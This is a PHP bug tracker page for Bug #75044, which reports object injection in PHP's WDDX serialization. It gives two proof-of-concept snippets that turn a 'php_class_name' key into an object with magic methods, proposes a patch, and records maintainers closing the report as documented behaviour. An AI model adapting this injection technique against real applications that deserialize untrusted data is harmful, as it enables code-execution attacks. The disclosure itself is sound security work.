php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #75044 Object Injection in PHP's WDDX Serialization
Submitted: 2017-08-07 10:20 UTC Modified: 2020-12-05 16:21 UTC
From: taoguangchen at icloud dot com Assigned: cmb (profile)
Status: Not a bug Package: WDDX related
PHP Version: 5.6.31 OS: *
Private report: No CVE-ID: None
View Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
If you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: taoguangchen at icloud dot com
New email:
PHP Version: OS:

 

 [2017-08-07 10:20 UTC] taoguangchen at icloud dot com
Description:
------------
PoC 1:
```
class ryat {
	var $hi;
	function __wakeup() {
		echo 'hi';
	}
	function __destruct() {
		echo $this->hi;
	}
}

$array = ['php_class_name'=>'ryat', 'hi'=>'ryat'];
wddx_deserialize(wddx_serialize_value($array));
```
PoC 2:
```
ini_set('session.serialize_handler', 'wddx');
session_start();

$array = ['php_class_name'=>'ryat', 'hi'=>'ryat'];
$_SESSION['ryat'] = $array;
session_decode(session_encode());

class ryat {
	var $hi;
	function __wakeup() {
		echo 'hi';
	}
	function __destruct() {
		echo $this->hi;
	}
}
```

Fix:
```
static void php_wddx_serialize_array(wddx_packet *packet, zval *arr)
{
...
		if (is_struct) {
			ent_type = zend_hash_get_current_key_ex(target_hash, &key, &key_len, &idx, 0, NULL);

			if (ent_type == HASH_KEY_IS_STRING) {
+				if (!strcmp(key, PHP_CLASS_NAME_VAR)) {
+					continue;
+				}
				php_wddx_serialize_var(packet, *ent, key, key_len TSRMLS_CC);
```


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-08-07 19:50 UTC] stas@php.net
The proposed fix doesn't seem to fix anything in fact, as it's changing serialization, not unserialization, but the question is should we consider this an issue? I.e. if wddx supports live php objects, it would be basically in the same class as unserialize, with same (none) security guarantees as it seems.
 [2017-08-13 19:40 UTC] cmb@php.net
-Type: Security +Type: Bug
 [2017-08-13 19:40 UTC] cmb@php.net
> it would be basically in the same class as unserialize, with
> same (none) security guarantees as it seems.

Indeed, it is; see <http://news.php.net/php.internals/100183> and
<http://svn.php.net/viewvc?view=revision&revision=342852>.
 [2020-12-05 16:21 UTC] cmb@php.net
-Status: Open +Status: Not a bug -Assigned To: +Assigned To: cmb
 [2020-12-05 16:21 UTC] cmb@php.net
Actually, this is not even a bug; the behavior is documented and
it is warned against passing untrusted input to that function.
Also, the complete WDDX extension is deprecated and unbundled as
of PHP 7.4.0.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Fri Dec 06 17:01:27 2024 UTC